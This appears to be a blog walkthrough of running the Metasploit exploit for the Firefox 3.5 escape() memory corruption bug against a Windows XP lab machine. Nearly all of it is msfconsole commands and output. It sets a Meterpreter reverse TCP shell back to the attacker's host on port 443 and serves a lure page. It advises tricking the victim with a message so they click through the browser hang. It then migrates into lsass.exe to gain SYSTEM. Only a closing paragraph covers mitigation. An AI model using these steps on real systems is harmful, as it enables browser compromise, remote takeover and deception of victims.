Firefox 3.5 escape() Return Value Memory Corruption Metasploit Exploit
Metasploit has released an exploit for Mozilla Firefox version 3.5 Tracemonkey components of Firefox's javascript rendering engine. The bug is covered in in Mozilla’s Bugzilla as bug 503286. The first public exploit seen was in Milw0rm by the author SBerry aka Simon Berry-Byrne, he gives thanks to HD for his help in writing the exploit code which was later converted by HD in to a Metasploit module. The main exploit code is a javascript generated with the selected payload and then encoded to make it more difficult to be detected by HIPS, IPS and IDS systems. A way to use this module would be running msfconsole as root so as to be able to use low ports for our listeners:
carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole[sudo] password for carlos:
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
=[ msf v3.3-dev+ -- --=[ 384 exploits - 261 payloads+ -- --=[ 20 encoders - 7 nops=[ 166 auxmsf >
We then select the exploit and a Meterpreter reverse TCP shell:
msf > use exploit/multi/browser/firefox_escape_retvalmsf exploit(firefox_escape_retval) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcp
We take a look at the options available:
msf exploit(firefox_escape_retval) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The local host to listen on.SRVPORT 8080 yes The local port to listen on.SSL false no Use SSL
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique: seh, thread, processLHOST yes The local addressLPORT 4444 yes The local portExploit target:Id Name-- ----0 Firefox 3.5.0 on Windows XP SP0-SP3
A recommended way of attacking would be to set the port for the exploit to port 80 since this is the default port for HTTP which will be the protocol we will use to exploit the browser, we will set a friendly URI path:
msf exploit(firefox_escape_retval) > set SRVPORT 80SRVPORT => 80msf exploit(firefox_escape_retval) > set URIPATH secret.htmlURIPATH => secret.html
For the payload we will set the local host from where we are lunching the attack and to where we want the target to connect back to, we choose port 443 the default port for HTTPS since the chances of this port being open in most environments tend to be high:
msf exploit(firefox_escape_retval) > set LHOST 192.168.1.158LHOST => 192.168.1.158msf exploit(firefox_escape_retval) > set LPORT 443LPORT => 443
Now the exploit is ran and it will listen for the targets connection:
msf exploit(firefox_escape_retval) > exploit[*] Exploit running as background job.msf exploit(firefox_escape_retval) >[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler[*] Using URL: http://0.0.0.0:80/secret.html[*] Local IP: http://192.168.1.158:80/secret.html[*] Server started.
We craft our email or other type of message for the target to read and we inform him that he might get a popup stating that the script may have hanged and to just click continue since is normal. The message that will appear at the target will be something similar to this:
When the client click on the link the exploit will be deployed with the payload:
[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.139:1046...[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)[*] Meterpreter session 1 opened (192.168.1.158:443 -> 192.168.1.139:1047)msf exploit(firefox_escape_retval) > sessions -i 1[*] Starting interaction with 1...meterpreter > sysinfoComputer: WINXPLAB01OS : Windows XP (Build 2600, Service Pack 2).
Since the browser window will hang and might be closed by the target it is important to migrate of that process as quickly as possible so we run the migrate script:
meterpreter > run migrate[*] Migrating to lsass.exe...[*] Current server process: firefox.exe (1800)[*] New server process: lsass.exe (684)meterpreter > sysinfoComputer: WINXPLAB01OS : Windows XP (Build 2600, Service Pack 2).meterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter >
This exploit differs from the latest ones made public for IE ActiveX controls since this exploit may require some additional steps to be conducted by the target system to be able to get a shell back. This exploit only works at the moment of this writing for Windows XP SP0 – SP3 with Firefox 3.5.0 and in testing it was found that it did not worked 100% of the time since several tries where needed on some of the labs machines while others worked on the first try.
A way to mitigate this attack would be to change in Firefox by entering in the address bar the about:config and changing the parameter for javascript.options.jit.content
or simply using the NoScript add-on. The mitigation on a large enterprise will be difficult do to that a GPO (Group Policy Object) can not be pushed to client and logging script is one of the alternatives that will have to be used to mitigate the risk.